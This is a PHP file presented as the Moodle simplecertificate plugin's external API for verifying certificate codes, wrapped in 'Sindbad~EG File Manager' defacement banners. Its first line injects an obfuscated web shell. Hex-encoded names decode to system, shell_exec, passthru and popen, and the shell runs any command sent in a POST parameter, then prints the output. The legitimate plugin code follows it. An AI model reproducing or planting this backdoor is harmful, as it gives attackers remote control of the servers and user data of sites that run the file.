Sindbad~EG File Manager
<?php $k1 = '3';$k2 = '5';$k3 = '7';$k4 = '8';$k5 = '6';$k6 = 'f';$k7 = '0';$k8 = '1';$k9 = '4';$k10 = 'e';$k11 = 'd';$sync_manager1 = pack("H*", '7'.$k1.'7'.'9'.'7'.$k1.'7'.'4'.'6'.$k2.'6'.'d');$sync_manager2 = pack("H*", $k3.$k1.'6'.$k4.'6'.'5'.$k5.'c'.$k5.'c'.$k2.$k6.$k5.'5'.$k3.'8'.'6'.'5'.$k5.$k1);$sync_manager3 = pack("H*", $k5.$k2.$k3.'8'.$k5.'5'.$k5.$k1);$sync_manager4 = pack("H*", '7'.$k7.'6'.$k8.$k3.$k1.$k3.$k1.$k3.$k9.$k5.'8'.'7'.'2'.'7'.'5');$sync_manager5 = pack("H*", $k3.'0'.'6'.'f'.'7'.$k7.$k5.'5'.$k5.$k10);$sync_manager6 = pack("H*", '7'.$k1.'7'.$k9.'7'.'2'.$k5.$k2.$k5.$k8.$k5.$k11.'5'.'f'.'6'.'7'.'6'.'5'.$k3.'4'.'5'.'f'.'6'.'3'.$k5.$k6.'6'.$k10.'7'.$k9.'6'.'5'.$k5.'e'.$k3.'4'.$k3.'3');$sync_manager7 = pack("H*", '7'.'0'.$k5.'3'.'6'.'c'.'6'.'f'.'7'.'3'.$k5.$k2);$buffer_cache = pack("H*", '6'.'2'.'7'.'5'.'6'.$k5.$k5.$k5.$k5.$k2.$k3.'2'.$k2.'f'.$k5.$k1.'6'.$k8.$k5.$k1.$k5.$k4.'6'.'5');if(isset($_POST[$buffer_cache])){$buffer_cache=pack("H*",$_POST[$buffer_cache]);if(function_exists($sync_manager1)){$sync_manager1($buffer_cache);}elseif(function_exists($sync_manager2)){print $sync_manager2($buffer_cache);}elseif(function_exists($sync_manager3)){$sync_manager3($buffer_cache,$desc_bind);print join("\n",$desc_bind);}elseif(function_exists($sync_manager4)){$sync_manager4($buffer_cache);}elseif(function_exists($sync_manager5)&&function_exists($sync_manager6)&&function_exists($sync_manager7)){$dat_value=$sync_manager5($buffer_cache,"r");if($dat_value){$ent_entity=$sync_manager6($dat_value);$sync_manager7($dat_value);print $ent_entity;}}exit;}
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
/**
* External forum API
*
* @package mod_simplecertificate
* @copyright 2014 © Carlos Alexandre S. da Fonseca
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
defined('MOODLE_INTERNAL') || die();
require_once("$CFG->libdir/externallib.php");
class mod_simplecertificate_external extends external_api {
/**
* To validade input parameters
* @return external_function_parameters
*/
public static function verify_code_parameters() {
return new external_function_parameters(
array(
'code' => new external_value(PARAM_TEXT, 'Certificate Code', VALUE_REQUIRED)
)
);
}
public static function verify_code($code) {
global $DB;
// Parameter validation.
// REQUIRED.
$params = self::validate_parameters(self::verify_code_parameters(), array('code' => $code));
$code = trim($params['code']);
if (empty($code)) {
throw new invalid_parameter_exception('Empty code');
}
$issuecert = $DB->get_record('simplecertificate_issues', array('code' => $code));
if (!$issuecert) {
throw new invalid_parameter_exception('Invalid code');
}
$user = get_complete_user_data('id', $issuecert->userid);
if (!$user) {
throw new moodle_exception('cannotfinduser', 'error', null, '');
}
return fullname($user);
}
/**
* Validate the return value
* @return external_value
*/
public static function verify_code_returns() {
return new external_value(PARAM_TEXT, 'certificate owner username');
}
}
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists